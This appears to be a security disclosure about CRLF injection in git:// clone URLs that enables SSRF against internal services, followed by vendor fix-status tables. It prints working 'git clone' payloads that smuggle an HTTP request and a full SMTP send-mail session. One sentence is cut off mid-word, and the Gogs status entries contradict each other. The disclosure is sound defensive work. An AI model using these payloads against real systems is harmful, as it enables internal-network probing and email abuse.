When we connect to a server with git:// protocol, server, we send an initial request packet that looks something like:
002dgit-upload-pack repo.git\0host=example.com
When the repository contains a newline on it, the git clone command also includes the newline (CR, LF) to the packet.
002egit-upload-pack repo
.git\0host=example.com
It looks fine at first sight, but the main problem with this is that it is possible to send packets to other ports to communicate with other protocols, which can lead to possibility of SSRF attack on internal services.
For example, running commands like the following
$ git clone 'git://localhost:1234/%0d%0a%0d%0aGET%20/%20HTTP/1.1 %0d%0aHost:localhost%0d%0a%0d%0a'
will eventually send the following packet to localhost:1234.
0050git-upload-pack /
GET / HTTP/1.1
Host:localhost
host=localhost:1234
We can somewhat create some sophisticated pro With this way, it is possible to send some SMTP packets like the following code and send e-mails over SMTP protocol.
$ git clone 'git://localhost:25/x%0d%0aHELO%20localhost%0d%0aMAIL%20FROM%3A%[email protected]%3E%0d%0aRCPT%20TO%3A%[email protected]%3E%0d%0aDATA%0d%0aFrom%3A%20%5BHacker%5D%20%[email protected]%3E%0d%0aTo%3A%20%[email protected]%0d%0aDate%3ATue,%2015%20Sep%202017%0aSubject%3A%20Hi%0d%0a.%0d%0aQUIT%0a'
git/git has been fixed appropriately.
Softwares that rely on git clone may be affected by this vulnerability.
| Product Name | Current Status | Reference |
|---|---|---|
| git | Fixed | @a02ea577 |
| Kallithea | Fixed | Release Notes v0.63 |
| Gogs | Fixed | Plans to fix in upcoming release (v0.13) |
| Gitea | Fixed | Release v1.12.6 |
| BitBucket | Mitigated | Bounty awarded: P3 |
| Product Name | Reason |
|---|---|
| GitHub | Git protocol is not supported |
| Gitee | Port part is filtered, which leads to no impact |
| Gogs | CRLF characters were filtered |